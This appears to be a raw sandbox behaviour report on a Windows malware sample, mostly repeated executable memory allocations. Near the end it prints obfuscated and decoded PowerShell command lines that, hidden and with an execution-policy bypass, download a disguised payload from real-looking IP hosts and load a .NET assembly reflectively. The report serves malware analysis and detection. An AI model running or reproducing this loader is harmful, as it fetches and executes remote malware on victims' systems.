protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02542000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02475000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02543000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02544000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02548000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02549000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ae000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029af000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfgjzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $arguments)"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2084
thread_handle: 0x000002f8
process_identifier: 2080
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
